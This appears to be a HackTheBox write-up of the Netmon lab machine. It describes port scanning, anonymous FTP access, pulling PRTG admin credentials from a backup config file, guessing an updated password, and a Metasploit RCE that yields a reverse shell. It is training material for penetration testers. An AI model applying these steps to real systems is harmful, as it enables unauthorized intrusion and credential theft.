Netmon
Netmon writeup by Thamizhiniyan C S
Last updated
Netmon writeup by Thamizhiniyan C S
Last updated
Hello everyone, In this writeup we are going to solve Netmon from HackTheBox.
Link to the machine: https://app.hackthebox.com/machines/177
Lets Start 🙌
Connect to the HTB server by using the OpenVpn configuration file that’s generated by HTB.
[ Click Here to learn more about how to connect to vpn and access the boxes. ]
After connecting to the vpn service, click on Join Machine to access the machine’s ip.
After joining the machine you can see the IP Address of the target machine.
First start by scanning the target. In my case I use rustscan, use your favourite tool.
Command: rustscan -a 10.10.10.152 -- -A -T4 -v -Pn
From the scan results found the following ports and services:
| Ports | Services | Version |
|---|---|---|
21 | FTP ( anonymous login allowed) | Microsoft ftpd |
80 | HTTP | Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor) |
135 | msrpc | Microsoft Windows RPC |
139 | netbios-ssn | Microsoft Windows netbios-ssn |
445 | microsoft-ds | Microsoft Windows Server 2008 R2- 2012 microsoft-ds |
47001 | HTTP | Microsoft HTTPAPI httpd 2.0z |
49665 | msrpc | Microsoft Windows RPC |
49666 | msrpc | Microsoft Windows RPC |
49667 | msrpc | Microsoft Windows RPC |
49668 | msrpc | Microsoft Windows RPC |
49669 | msrpc | Microsoft Windows RPC |
49664 | msrpc | Microsoft Windows RPC |
I first ran enum4linux , to enumerate the SMB shares but found nothing.
Next I visited the website running on port 80.
Found the above welcome page. The name of the application running on port 80 is PRTG Network Monitor. I googled the version Indy httpd 18.1.37.13946 which we got during scanning and got the following:
The application running on port 80 is vulnerable to RCE, but to execute the exploit successfully, we need to find the credentials. By this time I started to enumerate the FTP.
Since, Anonymous login is allowed for the FTP service. I logged in as Anonymous.
Next I started surfing around the files available in the FTP server and found the user flag at C:\Users\Public directory. I used the more command to view the contents of the user.txt file.
Next, I started further surfing around the FTP server and found that we do have access to all the program related files. So I googled out where the config files for the PRTG service is stored and got this:
So, I checked the C:\ProgramData\Paessler\PRTG Network Monitordirectory and found the following:
I first viewed the contents of the PRTG Configuration.dat.
Found nothing. Next I checked the PRTG configuration.old. This time also found nothing. Next I checked the PRTG configuration.old.bak and found the following:
Found the credentials prtgadmin:PrTg@dmin2018. Tried it on the PRTG Network Monitor portal.
But failed. Since we go this credential from the backup file, the password might be updated. This machine was released in 2019 and following the password pattern, we guess that the password might be PrTg@dmin2019. I tried it and it worked!
Now we have successfully logged in. Now we got valid credentials. Now as mentioned in the following site:
We can use metasploit to exploit this vulnerability.
Now run the exploit.
And we have successfully got the meterpreter reverse shell back.
On checking the C:\Users\Administrator\Desktop directory, found the root flag.
We have successfully found the root flag.
Thank You !!!
